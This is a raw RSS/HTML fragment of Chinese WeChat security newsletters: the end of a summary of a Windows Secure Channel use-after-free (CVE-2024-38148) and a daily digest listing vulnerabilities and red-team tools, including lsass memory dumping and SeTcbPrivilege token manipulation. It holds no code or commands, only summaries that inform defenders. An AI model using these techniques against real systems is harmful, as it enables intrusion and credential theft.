		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软官方对 CVE-2024-38148 的定义为 DoS 问题可能不完全准确，实际上是一个 UAF 漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过补丁对比，可以发现补丁的作用是屏蔽了某个字段的赋值操作，这一点是防止漏洞利用的关键。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">UAF 问题的产生是因为在 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CSsl3TlsContext::CSsl3TlsContext</code> 函数中未能更新 M1 的第一个字段，导致该字段仍然指向已释放的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">a2</code> 结构体。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">实际测试确认了 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CTls13ServerContext::CleanupConnectedState</code> 函数中存在 UAF 问题，这可能导致远程代码执行。</section></li></ul>
	<br/>
	<p>🏷️: Windows, 漏洞, RCE, Secure Channel, UAF</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.6096774193548387" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=91da8736&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg86C3EVW7ZBOD533reH1QnsMrQpNICvlegQ9GQz0uVvc9WnJvFe5mZg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487718">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=31bd5812&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487718%26idx%3D1%26sn%3D621ea5c2e0d12c57bf23b830a0e0a842%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 19 Aug 2024 17:32:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0812 | bh议题节选、红蓝工具、漏洞情报</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487708&amp;idx=1&amp;sn=cd5dd5acf5c37615c972d5742a0818f8</link>
      <description>Kibana发布紧急安全补丁；0.0.0.0 Day漏洞曝光；OpenVPN、Apache等曝高危漏洞；TrickDump工具可抓取lsass进程内存...</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-08-12 17:52</span> <span style="display: inline-block;">北京</span>
</p>

<p>Kibana发布紧急安全补丁；0.0.0.0 Day漏洞曝光；OpenVPN、Apache等曝高危漏洞；TrickDump工具可抓取lsass进程内存...</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=9e48f916&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPO3HXdWiblcZAfWKpOBDiaO75G5rPeAYOJkGegnQqEEedjshOr1jqJkgQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-08-12 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240812</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0806】使用SeTcbPrivilege特权进行令牌操作教程<br/>0x02 【2024-0807】Kibana发布紧急安全补丁修复严重漏洞<br/>0x03 【2024-0808】揭秘有效的网络定时攻击<br/>0x04 【2024-0808】利用电子邮件解析漏洞绕过访问控制<br/>0x05 【2024-0808】GhostWrite漏洞利用演示<br/>0x06 【2024-0808】0.0.0.0 Day漏洞：浏览器中利用本地主机API<br/>0x07 【2024-0809】统治所有漏洞：利用Windows预认证RCE漏洞<br/>0x08 【2024-0809】MaLDAPtive：LDAP搜索过滤器解析与混淆框架<br/>0x09 【2024-0809】OpenVPN漏洞被发现可导致远程代码执行和权限提升<br/>0x0a 【2024-0809】Apache HTTP服务器中的混淆攻击漏洞分析<br/>0x0b 【2024-0812】深入探讨Windows DLL加载机制<br/>0x0c 【2024-0812】TrickDump：无Minidump文件的lsass进程内存抓取工具<br/>0x0d 【2024-0812】Django SQL 注入漏洞曝光<br/>0x0e 【2024-0812】代码注入工具实现权限提升<br/>0x0f 【2024-0812】Windows远程桌面许可服务漏洞分析<br/>0x10 【2024-0812】L4LB四层负载均衡中的IP伪造漏洞详解<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 使用SeTcbPrivilege特权进行令牌操作教程</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">PowerOfTcb网站主要介绍了如何使用SeTcbPrivilege特权进行令牌操作，包括会话ID、源、强制策略和完整性级别的操作，以及如何使用LSA家族API创建特殊的登录令牌和新的SID映射，并提供了多个工具来演示这些操作。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.575925925925926" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e6e8874b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPn8COcg8AtzTuxtwp6PX0iahQCnn2ZxvCpFH48OpuOqJialicHbf07kw0w%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.575925925925926" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f4bf9c8e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPtfUDd9qbICyFR7dbXevKBP5xVFpsaCbBiao2miaQsgquBChQic4ib0KPyw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.575925925925926" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=99417e13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPMlLxYxtvwNljcQoI88fjGj7pZbZToXUg82N2Rc3YGBRNN7VmvxecGQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
